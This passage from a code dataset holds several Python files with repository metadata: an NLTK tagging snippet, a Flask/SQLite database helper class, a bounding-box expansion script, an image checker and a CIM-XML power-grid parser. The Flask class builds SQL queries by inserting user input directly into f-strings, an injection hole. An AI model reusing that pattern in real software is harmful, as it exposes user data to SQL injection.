pedaços.\nl1=nltk.word_tokenize('Ontem, o João Antunes comeu peixe ao almoço')\nprint(l1)\ntagged = t1.tag(nltk.word_tokenize('Ontem, o João Antunes comeu peixe ao almoço'))\nprint(tagged)\n\n\n\n\n\n\"\"\"\ngramatica = r\n#NE: {+}\n#PP: {}\n\n\nanaliseGramatical = nltk.RegexpParser(gramatica)\nanaliseGramatical.parse(tagged)\n\ntree = analiseGramatical.parse(tagged)\ntree.draw()\nprint(\"ola\")\n\"\"\"\n", "repo_name": "PJM97/IPLN", "sub_path": "TP2/cenas/andre.py", "file_name": "andre.py", "file_ext": "py", "file_size_in_byte": 1043, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "nltk.corpus.mac_morpho.tagged_sents", "line_number": 6, "usage_type": "call"}, {"api_name": "nltk.corpus", "line_number": 6, "usage_type": "attribute"}, {"api_name": "nltk.DefaultTagger", "line_number": 7, "usage_type": "call"}, {"api_name": "nltk.UnigramTagger", "line_number": 8, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 31, "usage_type": "call"}, {"api_name": "nltk.word_tokenize", "line_number": 33, "usage_type": "call"}]} +{"seq_id": "18598004841", "text": "import sqlite3\nimport time\nimport math\n\nfrom flask import url_for\n\n\nclass FDataBase:\n # Constructor\n def __init__(self, db):\n self.__db = db\n self.__cur = db.cursor()\n\n\n # Method returns list of values from table \"mainmenu\"\n def getMenu(self):\n sql = '''SELECT * FROM mainmenu'''\n try:\n self.__cur.execute(sql)\n res = self.__cur.fetchall()\n if res: return res\n except:\n print('Ошибка чтения из БД')\n return [] # If error, it returns empty list\n \n\n # Method add post to table\n def addPost(self, title, text, url):\n try:\n # Check that 'url' already doesn't exist\n self.__cur.execute(f'SELECT COUNT() as \"count\" FROM posts WHERE url LIKE \"{url}\"')\n res = self.__cur.fetchone()\n if res['count'] > 0:\n print('Статья с таким url уже существует')\n return False\n\n # time execute\n tm = math.floor(time.time())\n\n # insert values to table\n self.__cur.execute('INSERT INTO posts VALUES(NULL, ?, ?, ?, ?)', (title, text, url, tm))\n self.__db.commit()\n except sqlite3.Error as e:\n print('Ошибка добавления статьи в БД'+str(e))\n return False\n \n return True\n\n\n # Get post from table \"posts\"\n def getPost(self, alias):\n try:\n self.__cur.execute(f'SELECT title, text FROM posts WHERE url LIKE \"{alias}\" LIMIT 1')\n res = self.__cur.fetchone() # Mehod takes one value\n if res:\n \n # Regular expressions to invite full links to image\n # !!!Better save correcting link to data base for saving resourses\n # base = url_for('static', filename='img')\n # url to image\n # text = re.sub(r'(?P]*src=)(?P[\\\"'])(?P.+?)(?P=quote)>',\n # '\\\\g' + base + \"/\\\\g>\",\n # res['text'])\n # return (res['tittle', text])\n\n return res\n except sqlite3.Error as e:\n print(\"Ошибка получения статьи из БД\"+str(e))\n \n return (False, False)\n \n\n # Getting post annonce\n def getPostsAnonce(self):\n try:\n self.__cur.execute(f'SELECT id, title, text, url FROM posts ORDER BY time DESC')\n res = self.__cur.fetchall()\n if res: return res\n except sqlite3.Error as e:\n print('Ошибка получения статьи из БД'+str(e))\n \n return []\n\n\n # Add user register information\n def addUser(self, name, email, hpsw):\n try:\n self.__cur.execute(f'SELECT COUNT() as \"count\" FROM users WHERE email LIKE \"{email}\" ')\n res = self.__cur.fetchone()\n if res['count'] > 0:\n print('Пользователь с таким email уже существует')\n return False\n \n tm = 
math.floor(time.time())\n self.__cur.execute('INSERT INTO users VALUES (NULL, ?, ?, ?, NULL, ?)', (name, email, hpsw, tm))\n self.__db.commit()\n except sqlite3.Error as e:\n print('Ошибка добавления пользователя в БД'+str(e))\n \n return True\n \n\n # Getting user's information at id\n def getUser(self, user_id):\n try:\n self.__cur.execute(f'SELECT * FROM users WHERE id = {user_id} LIMIT 1')\n res = self.__cur.fetchone()\n if not res:\n print('Пользователь не найден')\n return False\n \n return res\n except sqlite3.Error as e:\n print('Ошибка получения данных из БД'+str(e))\n \n return False\n \n\n # identification user by email (function 'login')\n def getUserByEmail(self, email):\n try:\n self.__cur.execute(f'SELECT * FROM users WHERE email = \"{email}\" LIMIT 1')\n res = self.__cur.fetchone()\n if not res:\n print('Пользователь не найден')\n return False\n \n return res\n except sqlite3.Error as e:\n print('Ошибка получения данных из БД'+str(e))\n \n return False\n \n\n def updateUserAvatar(self, avatar, user_id):\n if not avatar:\n return False\n \n try:\n # Transfom file to binary object (method 'Binary')\n binary = sqlite3.Binary(avatar)\n self.__cur.execute(f'UPDATE users SET avatar = ? WHERE id = ?', (binary, user_id))\n self.__db.commit()\n except sqlite3.Error as e:\n print('Ошибка обновления аватара в БД'+str(e))\n return False\n return True\n", "repo_name": "Denis-Bez/Education_Python_01", "sub_path": "05_Education_Flask/FDataBase.py", "file_name": "FDataBase.py", "file_ext": "py", "file_size_in_byte": 5076, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "math.floor", "line_number": 38, "usage_type": "call"}, {"api_name": "time.time", "line_number": 38, "usage_type": "call"}, {"api_name": "sqlite3.Error", "line_number": 43, "usage_type": "attribute"}, {"api_name": "sqlite3.Error", "line_number": 67, "usage_type": "attribute"}, {"api_name": "sqlite3.Error", "line_number": 79, "usage_type": "attribute"}, {"api_name": "math.floor", "line_number": 94, "usage_type": "call"}, {"api_name": "time.time", "line_number": 94, "usage_type": "call"}, {"api_name": "sqlite3.Error", "line_number": 97, "usage_type": "attribute"}, {"api_name": "sqlite3.Error", "line_number": 113, "usage_type": "attribute"}, {"api_name": "sqlite3.Error", "line_number": 129, "usage_type": "attribute"}, {"api_name": "sqlite3.Binary", "line_number": 141, "usage_type": "call"}, {"api_name": "sqlite3.Error", "line_number": 144, "usage_type": "attribute"}]} +{"seq_id": "32818862175", "text": "#*** coding: utf-8 ***#\nimport os, sys, pdb\nimport numpy as np\nimport cv2\n\nfile_name, save_file = sys.argv[1:]\n\nmask_rois = 'roi_mask/'\nimg_shape = {}\nfor mask_file in os.listdir(mask_rois):\n roi_data = cv2.imread(os.path.join(mask_rois, mask_file))\n h, w, _ = roi_data.shape\n img_shape[mask_file.split('_')[-1].split('.')[0]] = [h, w] \n\n# file_name = 'track1_allocate_ids_89_2666.txt'\n\nlines = open(file_name).readlines()\n\n# save_file = 'track1_allocate_ids_89_2666_expand_1.2.txt'\nf_w = open(save_file, 'w')\n\nfor line in lines:\n line_list = line.split()\n cam_id = int(float(line_list[0]))\n obj_id = int(float(line_list[1]))\n frame_id = int(float(line_list[2]))\n x1 = int(float(line_list[3]))\n y1 = int(float(line_list[4]))\n w = int(float(line_list[5]))\n h = int(float(line_list[6]))\n x2 = x1 + w\n y2 = y1 + h\n\n #import pdb; pdb.set_trace()\n [height, width] = img_shape['c0' + str(cam_id)]\n \n cx = 0.5*x1 + 0.5*x2\n cy = 
0.5*y1 + 0.5*y2\n\n if w < 120:\n w = 1.2 * w\n else:\n w = 20 + w\n\n if h < 120:\n h = 1.2 *h\n else:\n h = 20 + h\n #w = min(w*1.2, w+40)\n #h = min(h*1.2, h+40)\n #w = min(w*1.3, w+40)\n #h = min(h*1.3, h+40)\n #w = min(w*1.4, w+45)\n #h = min(h*1.4, h+45)\n x1, y1 = max(0, cx - 0.5*w), max(0, cy - 0.5*h)\n x2, y2 = min(width, cx + 0.5*w), min(height, cy + 0.5*h)\n w , h = x2-x1 , y2-y1\n\n f_w.write(str(cam_id) + ' ' + str(obj_id) + ' ' + str(frame_id) + ' ' + str(int(x1)) + ' ' + str(int(y1)) + ' ' + str(int(w)) + ' ' + str(int(h)) + ' -1 -1' '\\n')\nf_w.close()\n", "repo_name": "Yejin0111/AICITY2022-Track1-MTMC", "sub_path": "ICA/postprocess/expand_pred_boxes.py", "file_name": "expand_pred_boxes.py", "file_ext": "py", "file_size_in_byte": 1631, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 33, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sys.argv", "line_number": 6, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 10, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path", "line_number": 11, "usage_type": "attribute"}]} +{"seq_id": "19858286067", "text": "import os, glob\nfrom PIL import Image\n\ndef checkImages(dir):\n print(\"Checking for black/white images\")\n os.chdir(dir)\n for file in glob.glob(\"*.tif\"):\n im = Image.open(file)\n extrema = im.convert(\"L\").getextrema()\n if (extrema == (0, 0)) or (extrema == (1, 1)): #image is all black or all white\n os.remove(file)\n print(file + \" was deleted as it was all black or white\")\n return 0\n", "repo_name": "maritime-web/Satellite-Consumer", "sub_path": "CheckImages.py", "file_name": "CheckImages.py", "file_ext": "py", "file_size_in_byte": 436, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.chdir", "line_number": 6, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 7, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 8, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 8, "usage_type": "name"}, {"api_name": "os.remove", "line_number": 11, "usage_type": "call"}]} +{"seq_id": "28847510176", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\n#Assignment 1 combines Python programming, CIM-XML modelling and parsing and\r\nfinally model building using Pandapower and using these create an embryo of Energy Management\r\nSystem.\r\n\r\n@author: Amritha Jayan and Sarika Vaiyapuri Gunassekaran\r\n\r\n\"\"\"\r\nimport xml.etree.ElementTree as ET\r\n\r\nfrom tkinter import *\r\nfrom tkinter import ttk\r\nimport tkinter\r\nfrom tkinter import filedialog\r\n\r\n# GUI of the application\r\nroot = Tk()\r\nroot.title(\"EH2745 - Assignment 1\")\r\ncontent = ttk.Frame(root)\r\nframe = ttk.Frame(content, borderwidth=5, relief=\"solid\", width=600, height=300)\r\nimg = PhotoImage(file='KTH.png')\r\npanel = ttk.Label(content, image=img)\r\ncontent.grid(column=1, row=0)\r\nframe.grid(column=1, row=0, columnspan=3, rowspan=2)\r\npanel.grid(column=1, row=0, columnspan=3, rowspan=2)\r\n\r\n# Insert File\r\ndef EQ_file():\r\n EQ_file = filedialog.askopenfilename()\r\n global EQ_file_XML, Message_EQ\r\n EQ_file_XML = EQ_file\r\n Message_EQ = \"Added EQ File\"\r\n\r\ndef SSH_file():\r\n SSH_file = filedialog.askopenfilename()\r\n global SSH_file_XML, Message_SSQ\r\n SSH_file_XML = SSH_file\r\n Message_SSH = \"Added SSH File\"\r\n\r\n# GUI 
Layout\r\nButton_EQ = Button(root, text=\"Select EQ File\", command=EQ_file)\r\nButton_EQ.grid(column=1, row=3, sticky='nesw')\r\nButton_SSH = Button(root, text=\"Select SSH File\", command=SSH_file)\r\nButton_SSH.grid(column=1, row=4, sticky='nesw')\r\nButton_Run = Button(root, text=\"Run\", command=root.destroy)\r\nButton_Run.grid(column=1, row=5,sticky='nesw')\r\n\r\nroot.mainloop()\r\n\r\n# Parse the XML files\r\ntree_EQ = ET.parse(EQ_file_XML)\r\ntree_SSH = ET.parse(SSH_file_XML)\r\n\r\n# Get the root of the parsed trees\r\nroot_EQ = tree_EQ.getroot()\r\nroot_SSH = tree_SSH.getroot()\r\n\r\n# Define the namespaces used in the XML files\r\nns = {'cim': 'http://iec.ch/TC57/2013/CIM-schema-cim16#',\r\n 'entsoe': 'http://entsoe.eu/CIM/SchemaExtension/3/1#',\r\n 'md': 'http://iec.ch/TC57/61970-552/ModelDescription/1#',\r\n 'rdf': '{http://www.w3.org/1999/02/22-rdf-syntax-ns#}'}\r\n\r\n# Import the required classes from their respective modules\r\nfrom GeneratingUnit import GeneratingUnit\r\nfrom ACLineSegment import ACLineSegment\r\nfrom BusbarSection import BusbarSection\r\nfrom Breaker import Breaker\r\nfrom PowerTransformer import PowerTransformer\r\nfrom RatioTapChanger import RatioTapChanger\r\nfrom EnergyConsumer import EnergyConsumer\r\nfrom LinearShuntCompensator import LinearShuntCompensator\r\nfrom SynchronousMachine import SynchronousMachine\r\nfrom BaseVoltage import BaseVoltage\r\nfrom VoltageLevel import VoltageLevel\r\nfrom RegulatingControl import RegulatingControl\r\nfrom ConductingEquipment import ConductingEquipment\r\nfrom ConnectivityNode import ConnectivityNode\r\nfrom Terminal import Terminal\r\n\r\n# Initialize empty lists to store the extracted information from the EQ XML files\r\nACLine_Segment_length = []\r\nACLine_Segment_list = []\r\nACLine_Segment_name = []\r\nBaseVoltage_list = []\r\nBreaker_list = []\r\nBusbarSection_list = []\r\nConductingEquipment_list = []\r\nConnectivityNode_list = []\r\nConnectivityNode_list_id = []\r\nEnergyConsumer_list = []\r\nGeneratingUnit_list = []\r\nLinearShuntCompensator_list = []\r\nObject_name_list = []\r\nPowerTransformer_list = []\r\nRatioTapChanger_list = []\r\nRegulatingControl_list = []\r\nSynchronousMachine_list = []\r\nTerminal_list = []\r\nTerminal_list_ConductingEquipment = []\r\nTerminal_list_ConnectivityNode = []\r\nVoltageLevel_list = []\r\nnode_list = []\r\n\r\n# Initialize empty lists to store the extracted information from the SSH XML files\r\nBreaker_list_ssh = []\r\nEnergyConsumer_list_ssh = []\r\nObject_name_list_2 = []\r\nRatioTapChanger_list_ssh = []\r\nTerminal_list_ssh = []\r\n\r\n# Loop through the root_EQ list of equipment to mapping the attributes to the corresponding attributes\r\n# of the class and extract relevant data from the EQ XML file.\r\nfor equipment in root_EQ:\r\n if ns['cim'] in equipment.tag:\r\n name = equipment.tag.replace(\"{\"+ns['cim']+\"}\", \"\")\r\n Object_name_list.append(name)\r\n # Check the type of equipment and create an instance of the corresponding class\r\n if name == 'BusbarSection':\r\n Busbar_Section = BusbarSection(equipment)\r\n Busbar_Section.name = equipment.find('cim:IdentifiedObject.name', ns).text\r\n Busbar_Section.id = equipment.attrib.get(ns['rdf']+'ID')\r\n Busbar_Section.Node_Type = 'CE'\r\n Busbar_Section.EquipmentContainer = equipment.find('cim:Equipment.EquipmentContainer', ns).attrib.get(ns['rdf']+'resource').replace('#', '')\r\n BusbarSection_list.append(Busbar_Section)\r\n ConductingEquipment_list.append(Busbar_Section)\r\n Busbar_Section.CE_type = 
'BusbarSection'\r\n\r\n elif name == 'ACLineSegment':\r\n ACLine_Segment = ACLineSegment(equipment)\r\n ACLine_Segment.name = equipment.find('cim:IdentifiedObject.name', ns).text\r\n ACLine_Segment.Node_Type = 'CE'\r\n ACLine_Segment.id = equipment.attrib.get(ns['rdf']+'ID')\r\n ACLine_Segment.name = equipment.find('cim:IdentifiedObject.name', ns).text\r\n ACLine_Segment.r = equipment.find('cim:ACLineSegment.r', ns).text\r\n ACLine_Segment.x = equipment.find('cim:ACLineSegment.x', ns).text\r\n ACLine_Segment.bch = equipment.find('cim:ACLineSegment.bch', ns).text\r\n ACLine_Segment.length = equipment.find('cim:Conductor.length', ns).text\r\n ACLine_Segment_list.append(ACLine_Segment)\r\n ACLine_Segment_name.append(ACLine_Segment.name)\r\n ACLine_Segment_length.append(ACLine_Segment.length)\r\n ConductingEquipment_list.append(ACLine_Segment)\r\n\r\n elif name == 'Breaker':\r\n Brea_ker = Breaker(equipment)\r\n Brea_ker.id = equipment.attrib.get(ns['rdf']+'ID')\r\n Brea_ker.Node_Type = 'CE'\r\n Brea_ker.container_id = equipment.find('cim:Equipment.EquipmentContainer', ns).attrib.get(ns['rdf']+'resource').replace('#', '')\r\n Breaker_list.append(Brea_ker)\r\n ConductingEquipment_list.append(Brea_ker)\r\n\r\n elif name == 'EnergyConsumer':\r\n Energy_Consumer = EnergyConsumer(equipment)\r\n Energy_Consumer.name = equipment.find('cim:IdentifiedObject.name', ns).text\r\n Energy_Consumer.id = equipment.attrib.get(ns['rdf']+'ID')\r\n Energy_Consumer.aggregate = equipment.find('cim:Equipment.aggregate', ns).text\r\n Energy_Consumer.container_id = equipment.find('cim:Equipment.EquipmentContainer', ns).attrib.get(ns['rdf']+'resource').replace('#', '')\r\n Energy_Consumer.Node_Type = 'CE '\r\n EnergyConsumer_list.append(Energy_Consumer)\r\n ConductingEquipment_list.append(Energy_Consumer)\r\n\r\n elif name == 'GeneratingUnit':\r\n Generating_Unit = GeneratingUnit(equipment)\r\n Generating_Unit.name = equipment.find('cim:IdentifiedObject.name', ns).text\r\n Generating_Unit.id = equipment.attrib.get(ns['rdf']+'ID')\r\n Generating_Unit.initialP = equipment.find('cim:GeneratingUnit.initialP', ns).text\r\n Generating_Unit.nominalP = equipment.find('cim:GeneratingUnit.nominalP', ns).text\r\n Generating_Unit.maxOperatingP = equipment.find('cim:GeneratingUnit.maxOperatingP', ns).text\r\n Generating_Unit.minOperatingP = equipment.find('cim:GeneratingUnit.minOperatingP', ns).text\r\n Generating_Unit.container_id = equipment.find('cim:Equipment.EquipmentContainer', ns).attrib.get(ns['rdf']+'resource').replace('#', '')\r\n Generating_Unit.Node_Type = 'CE '\r\n GeneratingUnit_list.append(Generating_Unit)\r\n\r\n elif name == 'LinearShuntCompensator':\r\n LinearShunt_Compensator = LinearShuntCompensator(equipment)\r\n LinearShunt_Compensator.name = equipment.find('cim:IdentifiedObject.name', ns).text\r\n LinearShunt_Compensator.id = equipment.attrib.get(ns['rdf']+'ID')\r\n LinearShunt_Compensator.container_id = equipment.find('cim:Equipment.EquipmentContainer', ns).attrib.get(ns['rdf']+'resource').replace('#', '')\r\n LinearShunt_Compensator.RegulatingControl = equipment.find('cim:RegulatingCondEq.RegulatingControl', ns).attrib.get(ns['rdf']+'resource')\r\n LinearShunt_Compensator.nomU = float(equipment.find('cim:ShuntCompensator.nomU', ns).text)\r\n LinearShunt_Compensator.b = float(equipment.find('cim:LinearShuntCompensator.bPerSection', ns).text)\r\n LinearShunt_Compensator.q = float(LinearShunt_Compensator.b*LinearShunt_Compensator.nomU*LinearShunt_Compensator.nomU)\r\n LinearShunt_Compensator.Node_Type = 'CE 
'\r\n LinearShuntCompensator_list.append(LinearShunt_Compensator)\r\n ConductingEquipment_list.append(LinearShunt_Compensator)\r\n\r\n elif name == 'VoltageLevel':\r\n Voltage_Level = VoltageLevel(equipment)\r\n Voltage_Level.name = equipment.find('cim:IdentifiedObject.name', ns).text\r\n Voltage_Level.id = equipment.attrib.get(ns['rdf']+'ID')\r\n Voltage_Level.lowVoltageLimit = equipment.find('cim:VoltageLevel.lowVoltageLimit', ns).text\r\n Voltage_Level.highVoltageLimit = equipment.find('cim:VoltageLevel.highVoltageLimit', ns).text\r\n Voltage_Level.Substation = equipment.find('cim:VoltageLevel.Substation', ns).attrib.get(ns['rdf']+'resource')\r\n Voltage_Level.BaseVoltage = equipment.find('cim:VoltageLevel.BaseVoltage', ns).attrib.get(ns['rdf']+'resource').replace('#', '')\r\n VoltageLevel_list.append(Voltage_Level)\r\n\r\n elif name == 'PowerTransformer':\r\n Power_Transformer = PowerTransformer(equipment)\r\n Power_Transformer.name = equipment.find('cim:IdentifiedObject.name', ns).text\r\n Power_Transformer.id = equipment.attrib.get(ns['rdf']+'ID')\r\n Power_Transformer.Node_Type = 'CE'\r\n Power_Transformer.EquipmentContainer = equipment.find('cim:Equipment.EquipmentContainer', ns).attrib.get(ns['rdf']+'resource').replace('#', '')\r\n PowerTransformer_list.append(Power_Transformer)\r\n ConductingEquipment_list.append(Power_Transformer)\r\n\r\n elif name == 'RatioTapChanger':\r\n Ratio_TapChanger = RatioTapChanger(equipment)\r\n Ratio_TapChanger.name = equipment.find('cim:IdentifiedObject.name', ns).text\r\n Ratio_TapChanger.id = equipment.attrib.get(ns['rdf']+'ID')\r\n Ratio_TapChanger.Node_Type = 'CE'\r\n Ratio_TapChanger.TapChangerControl = equipment.find('cim:TapChanger.TapChangerControl', ns).attrib.get(ns['rdf']+'resource')\r\n Ratio_TapChanger.neutralU = equipment.find('cim:TapChanger.neutralU', ns).text\r\n Ratio_TapChanger.lowStep = equipment.find('cim:TapChanger.lowStep', ns).text\r\n Ratio_TapChanger.highStep = equipment.find('cim:TapChanger.highStep', ns).text\r\n Ratio_TapChanger.neutralStep = equipment.find('cim:TapChanger.neutralStep', ns).text\r\n Ratio_TapChanger.normalStep = equipment.find('cim:TapChanger.normalStep', ns).text\r\n Ratio_TapChanger.stepVoltageIncrement = equipment.find('cim:RatioTapChanger.stepVoltageIncrement', ns).text\r\n RatioTapChanger_list.append(Ratio_TapChanger)\r\n\r\n elif name == 'SynchronousMachine':\r\n Synchronous_Machine = SynchronousMachine(equipment)\r\n Synchronous_Machine.name = equipment.find('cim:IdentifiedObject.name', ns).text\r\n Synchronous_Machine.id = equipment.attrib.get(ns['rdf']+'ID')\r\n SynchronousMachine_list.append(Synchronous_Machine)\r\n Synchronous_Machine.EquipmentContainer = equipment.find('cim:Equipment.EquipmentContainer', ns).attrib.get(ns['rdf']+'resource').replace('#', '')\r\n Synchronous_Machine.GeneratingUnit = equipment.find('cim:RotatingMachine.GeneratingUnit', ns).attrib.get(ns['rdf']+'resource')\r\n Synchronous_Machine.ratedU = equipment.find('cim:RotatingMachine.ratedU', ns).text\r\n Synchronous_Machine.Node_Type = 'CE'\r\n ConductingEquipment_list.append(Synchronous_Machine)\r\n\r\n elif name == 'BaseVoltage':\r\n Base_Voltage = BaseVoltage(equipment)\r\n Base_Voltage.name = equipment.find('cim:IdentifiedObject.name', ns).text\r\n Base_Voltage.id = equipment.attrib.get(ns['rdf']+'ID')\r\n Base_Voltage.Node_Type = 'CE'\r\n BaseVoltage_list.append(Base_Voltage)\r\n Base_Voltage.nominalVoltage = equipment.find('cim:BaseVoltage.nominalVoltage', ns).text\r\n\r\n elif name == 'ConnectivityNode':\r\n 
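# a ConnectivityNode is a purely topological junction; the container id stored here is matched\r\n            # against a VoltageLevel further below to assign the node its nominal voltage\r\n            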
Connectivity_Node = ConnectivityNode(equipment)\r\n            Connectivity_Node.name = equipment.find('cim:IdentifiedObject.name', ns).text\r\n            Connectivity_Node.id = equipment.attrib.get(ns['rdf']+'ID')\r\n            Connectivity_Node.container_id = equipment.find('cim:ConnectivityNode.ConnectivityNodeContainer', ns).attrib.get(ns['rdf']+'resource').replace('#', '')\r\n            Connectivity_Node.Node_Type = 'CN'\r\n            ConnectivityNode_list.append(Connectivity_Node)\r\n            ConnectivityNode_list_id.append(Connectivity_Node.id)\r\n\r\n        elif name == 'Terminal':\r\n            T_erminal = Terminal(equipment)\r\n            T_erminal.name = equipment.find('cim:IdentifiedObject.name', ns).text\r\n            T_erminal.id = equipment.attrib.get(ns['rdf']+'ID')\r\n            T_erminal.ConductingEquipment = equipment.find('cim:Terminal.ConductingEquipment', ns).attrib.get(ns['rdf']+'resource').replace('#', '')\r\n            T_erminal.ConnectivityNode = equipment.find('cim:Terminal.ConnectivityNode', ns).attrib.get(ns['rdf']+'resource').replace('#', '')\r\n            T_erminal.Node_Type = 'TE'\r\n            T_erminal.traversal_flag = 0\r\n            Terminal_list.append(T_erminal)\r\n            Terminal_list_ConductingEquipment.append(\r\n                T_erminal.ConductingEquipment.replace('#', ''))\r\n            Terminal_list_ConnectivityNode.append(\r\n                T_erminal.ConnectivityNode.replace('#', ''))\r\n\r\n# Loop through the root_SSH list of equipment, mapping the attributes to the corresponding\r\n# class attributes and extracting the relevant data from the SSH XML file.\r\nfor equipment in root_SSH:\r\n    if ns['cim'] in equipment.tag:\r\n        name = equipment.tag.replace(\"{\"+ns['cim']+\"}\", \"\")\r\n        Object_name_list_2.append(name)\r\n        if name == 'Terminal':\r\n            T_erminal = Terminal(equipment)\r\n            T_erminal.id = equipment.attrib.get(ns['rdf']+'ID')\r\n            Terminal_list_ssh.append(T_erminal)\r\n\r\n        elif name == 'EnergyConsumer':\r\n            Energy_Consumer = EnergyConsumer(equipment)\r\n            Energy_Consumer.id = equipment.attrib.get(ns['rdf']+'ID')\r\n            Energy_Consumer.p = equipment.find('cim:EnergyConsumer.p', ns).text\r\n            Energy_Consumer.q = equipment.find('cim:EnergyConsumer.q', ns).text\r\n            EnergyConsumer_list_ssh.append(Energy_Consumer.p)\r\n\r\n        elif name == 'RatioTapChanger':\r\n            Ratio_TapChanger = RatioTapChanger(equipment)\r\n            Ratio_TapChanger.id = equipment.attrib.get(ns['rdf']+'ID')\r\n            Ratio_TapChanger.step = equipment.find('cim:TapChanger.step', ns).text\r\n            Ratio_TapChanger.controlEnabled = equipment.find('cim:TapChanger.controlEnabled', ns).text\r\n            RatioTapChanger_list_ssh.append(Ratio_TapChanger)\r\n\r\n        elif name == 'Breaker':\r\n            B_reaker = Breaker(equipment)\r\n            B_reaker.id = equipment.attrib.get(ns['rdf']+'ID')\r\n            B_reaker.Switch = equipment.find('cim:Switch.open', ns).text\r\n            Breaker_list_ssh.append(B_reaker)\r\n\r\n# Mapping Base Voltage and Nominal voltage of Busbar.\r\nfor equipment in root_EQ:\r\n    if ns['cim'] in equipment.tag:\r\n        name = equipment.tag.replace(\"{\"+ns['cim']+\"}\", \"\")\r\n        if name == 'BusbarSection':\r\n            for Busbar_Section in BusbarSection_list:\r\n                for Voltage_Level in VoltageLevel_list:\r\n                    if Busbar_Section.EquipmentContainer == Voltage_Level.id:\r\n                        for Base_Voltage in BaseVoltage_list:\r\n                            if Voltage_Level.BaseVoltage == Base_Voltage.id:\r\n                                Busbar_Section.voltage = float(\r\n                                    Base_Voltage.nominalVoltage)\r\n\r\n# Mapping Base Voltage and Nominal voltage of Connectivity Node.\r\nfor equipment in root_EQ:\r\n    if ns['cim'] in equipment.tag:\r\n        name = equipment.tag.replace(\"{\"+ns['cim']+\"}\", \"\")\r\n        if name == 'ConnectivityNode':\r\n            for CN in ConnectivityNode_list:\r\n                for Voltage_Level in 
VoltageLevel_list:\r\n                    if CN.container_id == Voltage_Level.id:\r\n                        for Base_Voltage in BaseVoltage_list:\r\n                            if Voltage_Level.BaseVoltage == Base_Voltage.id:\r\n                                CN.voltage = float(\r\n                                    Base_Voltage.nominalVoltage)\r\n\r\n\r\n# Network Traversing\r\n\r\n# Finding the terminal connected to respective CN\r\n\r\nTerminal_attached_to_CN_list = []\r\ndef find_Terminal_attached_to_CN(CN):\r\n    for TE in Terminal_list:\r\n        if CN.id == TE.ConnectivityNode:\r\n            return(TE)\r\n\r\ndef find_Terminal_attached_to_CN_list(CN):\r\n    Terminal_attached_to_CN_list1 = []\r\n    for TE in Terminal_list:\r\n        if TE.ConnectivityNode == CN.id:\r\n            Terminal_attached_to_CN_list1.append(TE)\r\n    return(Terminal_attached_to_CN_list1)\r\n\r\nfor CN in ConnectivityNode_list:\r\n    Terminal_attached_to_CN_list.append(find_Terminal_attached_to_CN(CN))\r\n\r\n# Finding the terminal connected to respective CE\r\ndef find_Terminal_attached_to_CE(CE):\r\n    for TE in Terminal_list:\r\n        if CE.id == TE.ConductingEquipment:\r\n            return(TE)\r\n\r\ndef find_Terminal_attached_to_ConductingEquipment_list(CE):\r\n    Terminal_attached_to_ConductingEquipment_list1 = []\r\n    for TE in Terminal_list:\r\n        if CE.id == TE.ConductingEquipment:\r\n            Terminal_attached_to_ConductingEquipment_list1.append(TE)\r\n    return(Terminal_attached_to_ConductingEquipment_list1)\r\n\r\nTerminal_attached_to_ConductingEquipment_list = []\r\nfor Node in ConductingEquipment_list:\r\n    Terminal_attached_to_ConductingEquipment_list.append(find_Terminal_attached_to_CE(Node))\r\n\r\n# Find and return the next node based on the previous node and current node types\r\ndef find_next_node(previous_node, current_node):\r\n    # If the current node is a ConnectivityNode ('CN'), return a randomly sampled terminal from Terminal_attached_to_CN_list\r\n    if current_node.Node_Type == 'CN':\r\n        return(random.sample(Terminal_attached_to_CN_list, 1))\r\n    # If the current node is a ConductingEquipment ('CE'), return a randomly sampled terminal from Terminal_attached_to_ConductingEquipment_list\r\n    elif current_node.Node_Type == 'CE':\r\n        return(random.sample(Terminal_attached_to_ConductingEquipment_list, 1))\r\n    # If the current node is a Terminal ('TE') and the previous node is a ConnectivityNode ('CN'), find the corresponding ConductingEquipment and return it\r\n    elif current_node.Node_Type == 'TE' and previous_node.Node_Type == 'CN':\r\n        for Node in ConductingEquipment_list: \r\n            if current_node.ConductingEquipment == Node.id:\r\n                return(Node)\r\n    # If the current node is a Terminal ('TE') and the previous node is a ConductingEquipment ('CE'), find the corresponding ConnectivityNode and return it\r\n    elif current_node.Node_Type == 'TE' and previous_node.Node_Type == 'CE':\r\n        for Node in ConnectivityNode_list:\r\n            if current_node.ConnectivityNode == Node.id:\r\n                return(Node)\r\n\r\n\r\n# number of terminals attached to connectivity node\r\n\r\ndef Num_attached_terminal_of_CN(CN):\r\n    # use a local list so repeated calls do not accumulate stale counts\r\n    number_list = []\r\n    for TE in Terminal_list:\r\n        if TE.ConnectivityNode == CN.id:\r\n            number_list.append(TE)\r\n    return(len(number_list))\r\n\r\n# number of terminals attached to ConductingEquipment\r\n\r\ndef Num_attached_terminal_of_CE(CE):\r\n    number_list = []\r\n    for TE in Terminal_list:\r\n        if TE.ConductingEquipment == CE.id:\r\n            number_list.append(TE)\r\n    return(len(number_list))\r\n\r\n# find the CNs attached to a busbar\r\nCN_attached_to_busbar_list = []\r\nCN_name = []\r\nfor CN in ConnectivityNode_list:\r\n    for TE in find_Terminal_attached_to_CN_list(CN):\r\n        
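# step across the terminal: find_next_node(CN, TE) returns the conducting equipment on the far side\r\n        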
